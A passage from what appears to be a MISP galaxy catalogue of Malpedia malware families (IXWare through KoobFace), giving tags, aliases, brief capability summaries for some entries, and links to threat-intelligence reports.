https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/
https://www.secureworks.com/research/threat-profiles/bronze-overbrook

IXWare

The tag is: misp-galaxy:malpedia="IXWare"

IXWare is also known as:

Table 2021. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ixware
https://fr3d.hk/blog/ixware-kids-will-be-skids

JackPOS

The tag is: misp-galaxy:malpedia="JackPOS"

JackPOS is also known as:

Table 2022. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos

Jaff

The tag is: misp-galaxy:malpedia="Jaff"

Jaff is also known as:

Table 2023. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
http://malware-traffic-analysis.net/2017/05/16/index.html
https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

Jager Decryptor

The tag is: misp-galaxy:malpedia="Jager Decryptor"

Jager Decryptor is also known as:

Table 2024. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor

Jaku

The tag is: misp-galaxy:malpedia="Jaku"

Jaku is also known as:

C3PRO-RACOON
KCNA Infostealer
Reconcyc

Table 2025. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku
https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf
https://securelist.com/whos-really-spreading-through-the-bright-star/68978/
https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146

Janeleiro

The tag is: misp-galaxy:malpedia="Janeleiro"

Janeleiro is also known as:

Table 2026. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.janeleiro
https://www.welivesecurity.com/2021/04/06/janeleiro-time-traveler-new-old-banking-trojan-brazil/
https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf

jason

Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.

The tag is: misp-galaxy:malpedia="jason"

jason is also known as:

Table 2027. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jason
https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
https://marcoramilli.com/2019/06/06/apt34-jason-project/
https://twitter.com/P3pperP0tts/status/1135503765287657472
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

Jasus

The tag is: misp-galaxy:malpedia="Jasus"

Jasus is also known as:

Table 2028. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus
https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

JCry

Ransomware written in Go.

The tag is: misp-galaxy:malpedia="JCry"

JCry is also known as:

Table 2029. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jcry
https://twitter.com/IdoNaor1/status/1101936940297924608
https://twitter.com/0xffff0800/status/1102078898320302080

Jeno

Ransomware.

The tag is: misp-galaxy:malpedia="Jeno"

Jeno is also known as:

Jest
Valeria

Table 2030. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jeno
https://id-ransomware.blogspot.com/2020/04/jeno-ransomware.html

JhoneRAT

Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.

The tag is: misp-galaxy:malpedia="JhoneRAT"

JhoneRAT is also known as:

Table 2031. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat
https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/
https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf
https://blog.talosintelligence.com/2020/01/jhonerat.html
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

Jigsaw

The tag is: misp-galaxy:malpedia="Jigsaw"

Jigsaw is also known as:

Table 2032. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw

Jimmy

The tag is: misp-galaxy:malpedia="Jimmy"

Jimmy is also known as:

Table 2033. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy
https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/

Joanap

The tag is: misp-galaxy:malpedia="Joanap"

Joanap is also known as:

Table 2034. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap
https://www.us-cert.gov/ncas/alerts/TA18-149A
https://www.secureworks.com/research/threat-profiles/nickel-academy
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/
https://www.us-cert.gov/ncas/analysis-reports/AR18-149A
https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware

Joao

The tag is: misp-galaxy:malpedia="Joao"

Joao is also known as:

Table 2035. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.joao
https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/

win.JobCrypter

The tag is: misp-galaxy:malpedia="win.JobCrypter"

win.JobCrypter is also known as:

Table 2036. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jobcrypter
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/jobcrypter-ransomware-with-new-routines-for-encryption-desktop-screenshots

Jolob

The tag is: misp-galaxy:malpedia="Jolob"

Jolob is also known as:

Table 2037. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob
http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html

JQJSNICKER

The tag is: misp-galaxy:malpedia="JQJSNICKER"

JQJSNICKER is also known as:

Table 2038. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker
http://marcmaiffret.com/vault7/

JripBot

The tag is: misp-galaxy:malpedia="JripBot"

JripBot is also known as:

Table 2039. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot
https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf

JSOutProx

JSOutProx is a sophisticated attack framework built using both Javascript and .NET. It uses the .NET (de)serialization feature to interact with a Javascript file which is the core module running on a victim machine. Once the malware is run on the victim, the framework can load several plugins performing additional malicious activities on the target.

The tag is: misp-galaxy:malpedia="JSOutProx"

JSOutProx is also known as:

Table 2040. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox
https://twitter.com/zlab_team/status/1208022180241530882
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat
https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/
https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese
https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/

JSSLoader

The tag is: misp-galaxy:malpedia="JSSLoader"

JSSLoader is also known as:

Table 2041. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader
https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf
https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded
https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

JuicyPotato

As described on the Github repository page, "A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM".

The tag is: misp-galaxy:malpedia="JuicyPotato"

JuicyPotato is also known as:

Table 2042. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato
https://github.com/ohpe/juicy-potato
https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf
https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/

JUMPALL

According to FireEye, JUMPALL is a malware dropper that has been observed dropping HIGHNOON/ZXSHELL/SOGU.

The tag is: misp-galaxy:malpedia="JUMPALL"

JUMPALL is also known as:

Table 2043. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jumpall
https://content.fireeye.com/apt-41/rpt-apt41/

Jupyter Stealer

The tag is: misp-galaxy:malpedia="Jupyter Stealer"

Jupyter Stealer is also known as:

Table 2044. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.jupyter
https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer
https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html
https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction
https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer
https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more
https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/
https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/
https://redcanary.com/blog/yellow-cockatoo/

KAgent

The tag is: misp-galaxy:malpedia="KAgent"

KAgent is also known as:

Table 2045. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent
https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

Karagany

The tag is: misp-galaxy:malpedia="Karagany"

Karagany is also known as:

Karagny

Table 2046. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany
https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector
https://www.secureworks.com/research/threat-profiles/iron-liberty
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf

Kardon Loader

According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.

The tag is: misp-galaxy:malpedia="Kardon Loader"

Kardon Loader is also known as:

Table 2047. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader
https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/
https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab

Karius

According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.

It comes with an injector that loads an intermediate "proxy" component, which in turn loads the actual banker component.

Communication with the c2 are in json format and encrypted with RC4 with a hardcoded key.

In the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.

The tag is: misp-galaxy:malpedia="Karius"

Karius is also known as:

Table 2048. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.karius
https://research.checkpoint.com/banking-trojans-development/
https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/

Karkoff

The tag is: misp-galaxy:malpedia="Karkoff"

Karkoff is also known as:

CACTUSPIPE
MailDropper

Table 2049. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff
https://mp.weixin.qq.com/s/o_EVjBVN2sQ1q7cl4rUXoQ
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/
https://www.secureworks.com/research/threat-profiles/cobalt-edgewater
https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/

karma

Ransomware.

The tag is: misp-galaxy:malpedia="karma"

karma is also known as:

Table 2050. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.karma
https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/

KasperAgent

The tag is: misp-galaxy:malpedia="KasperAgent"

KasperAgent is also known as:

Table 2051. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent
http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/
https://www.threatconnect.com/blog/kasperagent-malware-campaign/

Kazuar

The tag is: misp-galaxy:malpedia="Kazuar"

Kazuar is also known as:

Table 2052. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar
https://www.epicturla.com/blog/sysinturla
https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/
https://securelist.com/apt-trends-report-q1-2021/101967/
https://youtu.be/SW8kVkwDOrc?t=24706
https://securelist.com/sunburst-backdoor-kazuar/99981/

Kegotip

The tag is: misp-galaxy:malpedia="Kegotip"

Kegotip is also known as:

Table 2053. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

KEKW

Ransomware.

The tag is: misp-galaxy:malpedia="KEKW"

KEKW is also known as:

KEKW-Locker

Table 2054. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kekw
https://id-ransomware.blogspot.com/2020/03/kekw-ransomware.html

Kelihos

The tag is: misp-galaxy:malpedia="Kelihos"

Kelihos is also known as:

Table 2055. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos
https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/
https://www.justice.gov/opa/pr/russian-national-convicted-charges-relating-kelihos-botnet
https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/
https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/
https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf
https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/
https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/
https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/
https://en.wikipedia.org/wiki/Kelihos_botnet

KerrDown

The tag is: misp-galaxy:malpedia="KerrDown"

KerrDown is also known as:

Table 2056. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown
https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/
https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7
https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/
https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf
https://blog.cystack.net/word-based-malware-attack/
https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/
https://www.secureworks.com/research/threat-profiles/tin-woodlawn
https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam

Ketrican

Ketrican is a backdoor trojan used by APT 15.

The tag is: misp-galaxy:malpedia="Ketrican"

Ketrican is also known as:

Table 2057. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican
https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/
https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/
https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf
https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/

Ketrum

Intezer found this family mid May 2020, which appears to be a merger of the family Ketrican and Okrum.

The tag is: misp-galaxy:malpedia="Ketrum"

Ketrum is also known as:

Table 2058. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum
https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/

KeyBase

KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.

The tag is: misp-galaxy:malpedia="KeyBase"

KeyBase is also known as:

Kibex

Table 2059. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase
https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/
https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html
https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/
https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017
https://voidsec.com/keybase-en/
https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/
https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/

KeyBoy

The tag is: misp-galaxy:malpedia="KeyBoy"

KeyBoy is also known as:

TSSL

Table 2060. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy
https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/
https://citizenlab.ca/2016/11/parliament-keyboy/
https://www.secureworks.com/research/threat-profiles/bronze-hobart
https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/
https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html

APT3 Keylogger

The tag is: misp-galaxy:malpedia="APT3 Keylogger"

APT3 Keylogger is also known as:

Table 2061. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3
https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/
https://twitter.com/smoothimpact/status/773631684038107136
http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

KEYMARBLE

The tag is: misp-galaxy:malpedia="KEYMARBLE"

KEYMARBLE is also known as:

Table 2062. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble
https://www.us-cert.gov/ncas/analysis-reports/AR18-221A
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://research.checkpoint.com/north-korea-turns-against-russian-targets/

KGH_SPY

The tag is: misp-galaxy:malpedia="KGH_SPY"

KGH_SPY is also known as:

Table 2063. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy
https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite
https://mp.weixin.qq.com/s/cbaePmZSk_Ob0r486RMXyw

KHRAT

The tag is: misp-galaxy:malpedia="KHRAT"

KHRAT is also known as:

Table 2064. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat
https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor
https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/
https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/

Kikothac

The tag is: misp-galaxy:malpedia="Kikothac"

Kikothac is also known as:

Table 2065. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac
https://www.group-ib.com/resources/threat-research/silence.html

KillDisk

The tag is: misp-galaxy:malpedia="KillDisk"

KillDisk is also known as:

Table 2066. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk
https://www.secureworks.com/research/threat-profiles/iron-viking
https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/
http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/
https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/

KilllSomeOne

The tag is: misp-galaxy:malpedia="KilllSomeOne"

KilllSomeOne is also known as:

Table 2067. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.killsomeone
https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/

KimJongRat

The tag is: misp-galaxy:malpedia="KimJongRat"

KimJongRat is also known as:

Table 2068. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat
https://www.reuters.com/article/us-usa-election-cyber-louisiana-exclusiv/exclusive-national-guard-called-in-to-thwart-cyberattack-in-louisiana-weeks-before-election-idUSKBN27823F

Kimsuky

The tag is: misp-galaxy:malpedia="Kimsuky"

Kimsuky is also known as:

Table 2069. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky
https://blog.prevailion.com/2019/09/autumn-aperture-report.html
https://metaswan.github.io/posts/Malware-Kimsuky-group’s-resume-impersonation-malware
https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/
https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/
https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf
https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure
https://blog.alyac.co.kr/2347
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html
https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf
https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign

Kingminer

The tag is: misp-galaxy:malpedia="Kingminer"

Kingminer is also known as:

Table 2070. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer
https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-labs-kingminer-botnet-report.pdf

KINS

The tag is: misp-galaxy:malpedia="KINS"

KINS is also known as:

Kasper Internet Non-Security
Maple

Table 2071. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kins
https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/
https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/
https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html
https://github.com/nyx0/KINS

KIVARS (Windows)

The tag is: misp-galaxy:malpedia="KIVARS (Windows)"

KIVARS (Windows) is also known as:

Table 2072. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt
https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/
https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html

Klackring

Microsoft describes that threat actor ZINC is using Klackring as a malware dropped by ComeBacker, both being used to target security researchers.

The tag is: misp-galaxy:malpedia="Klackring"

Klackring is also known as:

Table 2073. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.klackring
https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/

KleptoParasite Stealer

KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.

PDB-strings suggest a relationship to JogLog v6 and v7.

The tag is: misp-galaxy:malpedia="KleptoParasite Stealer"

KleptoParasite Stealer is also known as:

Joglog
Parasite

Table 2074. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer

KlingonRAT

The tag is: misp-galaxy:malpedia="KlingonRAT"

KlingonRAT is also known as:

Table 2075. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.klingon_rat
https://www.intezer.com/blog/malware-analysis/klingon-rat-holding-on-for-dear-life/

KLRD

The tag is: misp-galaxy:malpedia="KLRD"

KLRD is also known as:

Table 2076. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd
https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks
https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html

Knot

Ransomware.

The tag is: misp-galaxy:malpedia="Knot"

Knot is also known as:

Table 2077. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.knot
https://twitter.com/malwrhunterteam/status/1345313324825780226

Koadic

The tag is: misp-galaxy:malpedia="Koadic"

Koadic is also known as:

Table 2078. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic
https://www.secureworks.com/research/threat-profiles/cobalt-trinity
https://blog.tofile.dev/2020/11/28/koadic_jarm.html
http://www.secureworks.com/research/threat-profiles/cobalt-ulster
https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf
https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter
https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf
https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
https://www.secureworks.com/research/threat-profiles/gold-drake
http://www.secureworks.com/research/threat-profiles/gold-drake
https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf
https://github.com/zerosum0x0/koadic
https://www.secureworks.com/research/threat-profiles/cobalt-ulster

KokoKrypt

The tag is: misp-galaxy:malpedia="KokoKrypt"

KokoKrypt is also known as:

Table 2079. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt
https://twitter.com/struppigel/status/812726545173401600

KOMPROGO

KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management, Creating a reverse shell, running WMI queries, retrieving information about the infected system.

The tag is: misp-galaxy:malpedia="KOMPROGO"

KOMPROGO is also known as:

Splinter RAT

Table 2080. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo
https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf
https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99
https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx

Konni

Konni is a remote administration tool, observed in the wild since early 2014. The Konni malware family is potentially linked to APT37, a North-Korean cyber espionage group active since 2012. The group primary victims are South-Korean political organizations, as well as Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East.

The tag is: misp-galaxy:malpedia="Konni"

Konni is also known as:

Table 2081. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.konni
https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/
http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html
https://blog.alyac.co.kr/2474
http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html
https://us-cert.cisa.gov/ncas/alerts/aa20-227a
https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant
https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/
https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/

KoobFace

The tag is: misp-galaxy:malpedia="KoobFace"

KoobFace is also known as:

Table 2082. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface
